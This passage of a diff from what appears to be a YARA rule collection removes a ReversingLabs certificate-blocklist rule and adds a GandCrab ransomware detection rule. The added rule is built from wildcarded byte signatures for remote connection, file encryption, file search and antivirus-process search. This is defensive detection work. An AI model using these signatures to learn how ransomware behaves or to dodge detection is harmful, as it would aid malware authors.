($encrypt_files_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_08D4352185317271C1Cec9D05C279Af7 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Gandcrab : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects GandCrab ransomware." author = "ReversingLabs" - id = "0165920f-5f4d-5b35-990d-120786b4c5ba" - date = "2023-11-08" - modified = "2023-11-08" + id = "a09ed7e6-f3a6-5f44-9d5b-a9c529cf1190" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L5598-L5614" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "b240962ab23729b241413ed1e53ac6541bf6b8a673c57522efd0cfe0c7eb9dd4" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.GandCrab.yara#L1-L892" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "79381635681482fc90defe4e10e97bf16d534837518fc06ae579822e9d77b461" score = 75 - quality = 90 - tags = "INFO, FILE" + quality = 88 + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "GandCrab" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Retalit LLC" and pe.signatures[i].serial=="08:d4:35:21:85:31:72:71:c1:ce:c9:d0:5c:27:9a:f7" and 1596585601<=pe.signatures[i].not_after) -} -import "pe" + strings: + $remote_connection = { + 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 8B F9 89 55 ?? 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 68 + ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 8B D8 89 5D ?? 85 DB 74 ?? 33 C0 + 83 F8 ?? 75 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 83 F8 ?? 74 ?? + 57 FF 15 ?? ?? ?? ?? 8D 4D ?? 8D 34 45 ?? ?? ?? ?? 8D 46 ?? 50 E8 ?? ?? ?? ?? 68 ?? + ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 56 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? + 8B D8 E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 89 45 ?? FF D6 57 53 FF D6 + 6A ?? 59 BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? F3 A5 8B 35 ?? ?? ?? ?? 53 FF D6 33 FF 8D + 85 ?? ?? ?? ?? 21 BD ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 + ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D + 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 83 EC ?? + FF 75 ?? 53 FF D6 8B 75 ?? 8D 4D ?? 50 53 8D 85 ?? ?? ?? ?? 50 56 E8 ?? ?? ?? ?? 85 + C0 74 ?? 47 83 7D ?? ?? 74 ?? 8B 4D ?? 8D 55 ?? 83 65 ?? ?? E8 ?? ?? ?? ?? 85 C0 74 + ?? 8B 45 ?? 85 C0 74 ?? 8B 4D ?? 89 01 EB ?? 33 FF 68 ?? ?? ?? ?? 6A ?? 56 FF 15 ?? + ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? FF 75 ?? + FF 15 ?? ?? ?? ?? 8B C7 5F 5E 5B 8B E5 5D C3 + } + $remote_connection_v2 = { + 55 8B EC 83 EC ?? 53 56 8B D9 89 55 ?? 57 8D 4D ?? 89 5D ?? E8 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 53 89 45 ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 3C 45 + ?? ?? ?? ?? 8D 47 ?? 50 6A ?? FF D6 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B D8 + FF D6 89 45 ?? 85 DB 74 ?? 8D 47 ?? 3B F8 73 ?? 8B F3 EB ?? 33 F6 FF 75 ?? 56 FF 15 + ?? ?? ?? ?? F3 0F 6F 05 ?? ?? ?? ?? 56 F3 0F 7F 45 ?? F3 0F 6F 05 ?? ?? ?? ?? F3 0F + 7F 45 ?? F3 0F 6F 05 ?? ?? ?? ?? F3 0F 7F 45 ?? F3 0F 6F 05 ?? ?? ?? ?? F3 0F 7F 45 + ?? F3 0F 6F 05 ?? ?? ?? ?? F3 0F 7F 45 ?? F3 0F 6F 05 ?? ?? ?? ?? F3 0F 7F 45 ?? FF + 15 ?? ?? ?? ?? 8D 45 ?? 33 FF 50 FF 15 ?? ?? ?? ?? 50 8D 45 ?? 50 68 ?? ?? ?? ?? 83 + EC ?? 68 ?? ?? ?? ?? FF 75 ?? 56 FF 15 ?? ?? ?? ?? 50 56 8B 75 ?? 8D 4D ?? 68 ?? ?? + ?? ?? 56 E8 ?? ?? ?? ?? 85 C0 74 ?? 83 7D ?? ?? BF ?? ?? ?? ?? 74 ?? 8B 4D ?? 8D 55 + ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 85 C0 74 ?? 8B 4D ?? 89 + 01 EB ?? 33 FF 68 ?? ?? ?? ?? 6A ?? 56 8B 35 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? 6A ?? + FF 75 ?? FF D6 68 ?? ?? ?? ?? 6A ?? 53 FF D6 8B 45 ?? 85 C0 74 ?? 50 FF 15 ?? ?? ?? + ?? 8B C7 5F 5E 5B 8B E5 5D C3 + } + $crypt_files = { + 55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 56 57 51 33 C0 89 4C 24 ?? 40 8B DA 50 51 50 + 83 EC ?? 89 5C 24 ?? 50 51 50 51 50 51 50 51 50 83 EC ?? 50 51 50 8D 8C 24 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 8B 75 ?? 8B + F8 03 F3 8D 4E ?? 8D 0C CF C1 E1 ?? 51 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 04 B7 8D 04 C5 + ?? ?? ?? ?? 50 8D 4C 24 ?? E8 ?? ?? ?? ?? 8B 75 ?? 89 44 24 ?? 8D 0C F5 ?? ?? ?? ?? + 51 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 0C DD ?? ?? ?? ?? 8B F8 51 8D 4C 24 ?? E8 ?? ?? ?? + ?? 8B D8 89 5C 24 ?? 85 FF 0F 84 ?? ?? ?? ?? 8D 44 24 ?? 50 57 68 ?? ?? ?? ?? 56 FF + 75 ?? 8D 0C 36 8B 35 ?? ?? ?? ?? 89 4C 24 ?? FF D6 8B 4C 24 ?? 8D 04 09 89 44 24 ?? + 8D 44 24 ?? 50 53 68 ?? ?? ?? ?? 51 FF 74 24 ?? FF D6 53 8B 1D ?? ?? ?? ?? FF D3 57 + 8B F0 FF D3 83 C0 ?? 8D 4C 24 ?? 03 C6 50 E8 ?? ?? ?? ?? 57 FF D3 40 8D 4C 24 ?? 50 + E8 ?? ?? ?? ?? FF 74 24 ?? 89 44 24 ?? FF D3 40 8D 4C 24 ?? 50 E8 ?? ?? ?? ?? 33 F6 + 89 44 24 ?? 8B CE 57 89 4C 24 ?? FF D3 85 C0 74 ?? 8B 54 24 ?? 89 54 24 ?? 8B 44 24 + ?? 8A 0C 38 80 F9 ?? 74 ?? 80 F9 ?? 74 ?? 88 0A 42 89 54 24 ?? 40 57 89 44 24 ?? FF + D3 8B 4C 24 ?? 8B 54 24 ?? 3B C8 72 ?? 8B 7C 24 ?? 57 FF D3 85 C0 74 ?? 8B 4C 24 ?? + 89 4C 24 ?? 8A 04 3E 3C ?? 74 ?? 3C ?? 74 ?? 88 01 41 89 4C 24 ?? 57 46 FF D3 8B 4C + 24 ?? 3B F0 72 ?? 8B 7C 24 ?? 8B 1D ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF D3 8B 35 ?? ?? + ?? ?? 57 FF D6 8D 4C 24 ?? 8D 3C 47 57 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF D3 57 FF + D6 FF 74 24 ?? 8D 34 47 FF 15 ?? ?? ?? ?? 50 56 6A ?? FF 74 24 ?? 6A ?? 68 ?? ?? ?? + ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF D3 57 FF 15 ?? ?? ?? ?? FF 74 24 ?? 8D 34 + 47 FF 15 ?? ?? ?? ?? 50 56 6A ?? FF 74 24 ?? 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? + 68 ?? ?? ?? ?? 57 FF D3 8B 74 24 ?? 8B 1D ?? ?? ?? ?? 56 FF D3 C1 E0 ?? 8D 4C 24 ?? + 83 C0 ?? 50 E8 ?? ?? ?? ?? 56 FF D3 8D 4C 24 ?? 8D 04 C5 ?? ?? ?? ?? 50 E8 ?? ?? ?? + ?? 56 89 44 24 ?? FF D3 8B 5C 24 ?? 8B F0 8B CB 8D 3C 36 8B D7 E8 ?? ?? ?? ?? 8D 44 + 24 ?? 8B CE 8B 74 24 ?? 50 56 68 ?? ?? ?? ?? 57 C1 E1 ?? 53 89 4C 24 ?? FF 15 ?? ?? + ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 56 FF D3 83 C0 ?? 8D 4C 24 ?? + 50 E8 ?? ?? ?? ?? 56 FF D3 40 8D 4C 24 ?? 50 E8 ?? ?? ?? ?? 89 44 24 ?? 33 F6 8B 44 + 24 ?? 8B FE 50 FF D3 85 C0 74 ?? 8B 54 24 ?? 89 54 24 ?? 8B 44 24 ?? 8A 0C 07 80 F9 + ?? 74 ?? 80 F9 ?? 74 ?? 88 0A 42 89 54 24 ?? 50 47 FF D3 8B 54 24 ?? 3B F8 72 ?? 8B + 7C 24 ?? 57 FF D3 50 FF 74 24 ?? 6A ?? 57 56 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? + 8D 54 24 ?? 89 74 24 ?? 8B CF E8 ?? ?? ?? ?? 59 85 C0 75 ?? 8D 4C 24 ?? E8 ?? ?? ?? + ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? EB ?? 8B 4C 24 ?? 85 C9 74 + ?? 8B 45 ?? 89 08 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? + E8 ?? ?? ?? ?? 33 F6 46 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 5F 8B + C6 5E 5B 8B E5 5D C3 + } + $crypt_files_v2 = { + 8B 55 ?? 8B 1D ?? ?? ?? ?? 8D 04 12 89 44 24 ?? 8D 44 24 ?? 50 51 68 ?? ?? ?? ?? 52 + FF 75 ?? FF D3 8D 04 36 89 44 24 ?? 8D 44 24 ?? 50 57 68 ?? ?? ?? ?? 56 FF 74 24 ?? + FF D3 8B 1D ?? ?? ?? ?? 57 FF D3 FF 74 24 ?? 8B F0 FF D3 6A ?? 83 C0 ?? 68 ?? ?? ?? + ?? 03 F0 56 6A ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? 89 44 24 ?? 89 44 24 ?? C7 44 24 ?? + ?? ?? ?? ?? FF D3 8B 54 24 ?? 40 85 D2 74 ?? 3B C6 73 ?? 8D 0C 02 89 44 24 ?? 89 4C + 24 ?? 89 54 24 ?? EB ?? C7 44 24 ?? ?? ?? ?? ?? 57 FF D3 40 83 7C 24 ?? ?? 74 ?? 03 + 44 24 ?? 3B C6 72 ?? C7 44 24 ?? ?? ?? ?? ?? FF 74 24 ?? 33 F6 FF D3 85 C0 74 ?? 8B + 7C 24 ?? EB ?? 8D 9B ?? ?? ?? ?? 8B 4C 24 ?? 8A 04 0E 3C ?? 74 ?? 3C ?? 74 ?? 88 07 + 47 51 46 FF D3 3B F0 72 ?? 8B 7C 24 ?? 57 33 F6 FF D3 85 C0 74 ?? 8B 4C 24 ?? 89 4C + 24 ?? 90 8A 04 3E 3C ?? 74 ?? 3C ?? 74 ?? 88 01 41 89 4C 24 ?? 57 46 FF D3 8B 4C 24 + ?? 3B F0 72 ?? 8B 74 24 ?? 8B 3D ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF D7 56 FF 15 ?? ?? + ?? ?? 8D 4C 24 ?? 8D 34 46 56 89 74 24 ?? E8 ?? ?? ?? ?? 8D 54 24 ?? C7 44 24 ?? ?? + ?? ?? ?? 8D 4C 24 ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 50 FF 15 ?? + ?? ?? ?? 68 ?? ?? ?? ?? 56 FF D7 8B 7C 24 ?? 57 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? + 56 FF 15 ?? ?? ?? ?? 8B 74 24 ?? 56 FF 74 24 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A + ?? 57 8B 3D ?? ?? ?? ?? FF D7 68 ?? ?? ?? ?? 6A ?? 56 FF D7 8B 74 24 ?? 68 ?? ?? ?? + ?? 56 FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 56 FF D7 FF 74 24 ?? 8D 34 46 FF D3 50 56 + 6A ?? FF 74 24 ?? 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 74 24 ?? 68 ?? ?? ?? ?? + 56 FF 15 ?? ?? ?? ?? 56 FF D7 8B 7C 24 ?? 57 8D 34 46 FF D3 50 56 6A ?? 57 6A ?? 68 + ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 + ?? 8B 35 ?? ?? ?? ?? FF D6 8B F8 6A ?? C1 E7 ?? 68 ?? ?? ?? ?? 83 C7 ?? 57 6A ?? FF + 15 ?? ?? ?? ?? FF 74 24 ?? 89 44 24 ?? FF D6 8D 0C C5 ?? ?? ?? ?? 8B 44 24 ?? 85 C0 + 74 ?? 3B CF 73 ?? 8B F8 EB ?? 33 FF FF 74 24 ?? FF D6 8B 0D ?? ?? ?? ?? 89 44 24 ?? + 85 C9 74 ?? 68 ?? ?? ?? ?? 6A ?? 51 FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? + ?? ?? FF D6 83 C0 ?? 50 6A ?? FF 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? + ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 8B 44 24 ?? 8B 4C 24 ?? 8D 34 00 + 8B D6 E8 ?? ?? ?? ?? 8B 4C 24 ?? 8D 04 CD ?? ?? ?? ?? 89 44 24 ?? 8D 44 24 ?? 50 57 + 68 ?? ?? ?? ?? 56 FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 57 FF + D3 6A ?? 68 ?? ?? ?? ?? 8D 70 ?? 56 6A ?? FF 15 ?? ?? ?? ?? 57 89 44 24 ?? FF D3 8D + 48 ?? 8B 44 24 ?? 85 C0 74 ?? 89 44 24 ?? 3B CE 72 ?? C7 44 24 ?? ?? ?? ?? ?? 57 33 + F6 FF D3 85 C0 74 ?? 8B 4C 24 ?? 89 4C 24 ?? 8A 04 3E 3C ?? 74 ?? 3C ?? 74 ?? 88 01 + 41 89 4C 24 ?? 57 46 FF D3 8B 4C 24 ?? 3B F0 72 ?? 8B 74 24 ?? 56 FF D3 50 FF 74 24 + ?? 6A ?? 56 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 51 8D 54 24 ?? C7 44 24 ?? + ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 1D ?? ?? ?? ?? 68 ?? ?? ?? + ?? 50 8B 44 24 ?? 50 FF D3 8B 44 24 ?? 68 ?? ?? ?? ?? 6A ?? 50 FF D3 68 ?? ?? ?? ?? + 6A ?? FF 74 24 ?? FF D3 68 ?? ?? ?? ?? 6A ?? FF 74 24 ?? FF D3 8D 4C 24 ?? E8 ?? ?? + ?? ?? 33 C0 5F 5E 5B 8B E5 5D C3 + } + $find_files = { + 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 89 55 ?? 8B F9 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? + ?? ?? 8B CF E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? + ?? 68 ?? ?? ?? ?? 57 8D 1C 47 89 5D ?? FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF + 15 ?? ?? ?? ?? 8B F0 33 C0 89 75 ?? 66 89 03 83 FE ?? 75 ?? B8 ?? ?? ?? ?? E9 ?? ?? + ?? ?? 8B 5D ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? + ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 85 ?? + ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 68 ?? ?? ?? ?? 57 FF 15 + ?? ?? ?? ?? 8B 55 ?? 8B CF 53 FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? FF 75 + ?? 8B 03 8D 95 ?? ?? ?? ?? 8B 73 ?? 51 8B CF 89 45 ?? E8 ?? ?? ?? ?? 01 03 59 11 53 + ?? 59 3B 73 ?? 77 ?? 72 ?? 8B 45 ?? 3B 03 73 ?? 8B 45 ?? FF 00 8B 75 ?? 8B 45 ?? 33 + C9 66 89 08 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 56 FF + 15 ?? ?? ?? ?? 33 C0 5F 5E 5B 8B E5 5D C3 + } + $find_files_v2 = { + 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 89 55 ?? 8B F9 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? + ?? ?? 8B CF E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? + ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 8D 1C 47 89 5D ?? FF D6 8D 85 ?? ?? ?? ?? 50 + 57 FF 15 ?? ?? ?? ?? 33 C9 89 45 ?? 66 89 0B 83 F8 ?? 75 ?? B8 ?? ?? ?? ?? 5F 5E 5B + 8B E5 5D C3 8B 5D ?? EB ?? 8D A4 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 + FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 + ?? ?? ?? ?? 85 C0 74 ?? 8D 85 ?? ?? ?? ?? 50 57 FF D6 F6 85 ?? ?? ?? ?? ?? 74 ?? 68 + ?? ?? ?? ?? 57 FF D6 8B 55 ?? 8B CF 53 FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? EB + ?? FF 75 ?? 8B 03 8D 95 ?? ?? ?? ?? 8B 73 ?? 51 8B CF 89 45 ?? E8 ?? ?? ?? ?? 83 C4 + ?? 01 03 11 53 ?? 3B 73 ?? 77 ?? 72 ?? 8B 45 ?? 3B 03 73 ?? 8B 45 ?? FF 00 8B 35 ?? + ?? ?? ?? 8B 45 ?? 33 C9 66 89 08 8D 85 ?? ?? ?? ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 + C0 0F 85 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 5F 5E 33 C0 5B 8B E5 5D C3 + } + $search_antivirus_processes = { + 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 B8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A + ?? 6A ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 85 ?? ?? ?? + ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? + ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? + ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? + ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? + ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? + ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? + ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? + ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 + ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 + ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? BB ?? ?? ?? ?? 8B F8 53 6A ?? + 89 7D ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 89 1E 83 FF ?? 74 ?? 56 57 FF 15 ?? ?? + ?? ?? 33 DB 8D 7E ?? 57 FF B4 9D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 76 ?? + 50 6A ?? FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 74 ?? 6A ?? 50 FF 15 ?? ?? ?? ?? FF 75 ?? + FF 15 ?? ?? ?? ?? 43 83 FB ?? 72 ?? 8B 7D ?? 56 57 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 85 + F6 74 ?? 68 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 5F 5E 5B 8B E5 + 5D C3 + } + $search_antivirus_processes_v2 = { + C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? + ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? + C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? + ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? + C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? + ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? + C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? + ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? + ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? + C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? + ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 + 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? + ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? + 68 ?? ?? ?? ?? 8B F0 6A ?? 89 74 24 ?? FF 15 ?? ?? ?? ?? 8B D8 85 DB 74 ?? C7 03 ?? + ?? ?? ?? 83 FE ?? 74 ?? 53 56 FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8D 4B ?? 33 F6 EB + ?? 8D A4 24 ?? ?? ?? ?? 90 51 FF 74 B4 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 73 ?? 50 + 6A ?? FF 15 ?? ?? ?? ?? 8B F8 85 FF 74 ?? 6A ?? 57 FF 15 ?? ?? ?? ?? 57 8B 3D ?? ?? + ?? ?? FF D7 EB ?? 8B 3D ?? ?? ?? ?? 46 8D 4B ?? 83 FE ?? 72 ?? 8B 74 24 ?? 53 56 FF + 15 ?? ?? ?? ?? 8D 4B ?? 85 C0 75 ?? 85 DB 74 ?? 68 ?? ?? ?? ?? 6A ?? 53 FF 15 ?? ?? + ?? ?? 56 FF D7 5F 5E 5B 8B E5 5D C3 + } + $find_files_v2_1 = { + 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 85 C0 74 + ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D3 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? + ?? F7 D8 1B C0 40 75 ?? BA ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 C0 75 ?? 8B CE E8 ?? + ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 8D 3C 46 89 7D ?? FF D3 8D 85 ?? ?? + ?? ?? 50 56 FF 15 ?? ?? ?? ?? 33 C9 89 45 ?? 66 89 0F 83 F8 ?? 75 ?? B8 ?? ?? ?? ?? + 5F 5E 5B 8B E5 5D C3 8B 7D ?? EB ?? 8D 9B ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? + ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 + FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF D3 F6 85 ?? ?? + ?? ?? ?? 74 ?? 83 7D ?? ?? 74 ?? BA ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 C0 0F 84 ?? + ?? ?? ?? 68 ?? ?? ?? ?? 56 FF D3 8B 55 ?? 8B CE 6A ?? 57 FF 75 ?? FF 75 ?? E8 ?? ?? + ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF D3 8B 55 ?? 8B CE 6A ?? 57 FF 75 + ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8B 07 6A ?? 68 ?? ?? ?? ?? 68 ?? + ?? ?? ?? 89 45 ?? 8B 47 ?? 6A ?? 89 45 ?? FF 15 ?? ?? ?? ?? 56 8B D8 68 ?? ?? ?? ?? + 53 FF 15 ?? ?? ?? ?? 83 C4 ?? 8B CB E8 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 6A ?? + 53 FF 15 ?? ?? ?? ?? 0F 57 C0 66 0F 13 45 ?? 8B 45 ?? 8B 4D ?? EB ?? 83 BD ?? ?? ?? + ?? ?? 0F 57 C0 66 0F 13 45 ?? 72 ?? 51 FF 75 ?? 8B CB E8 ?? ?? ?? ?? 83 C4 ?? 89 55 + ?? EB ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 68 ?? ?? ?? ?? 6A ?? 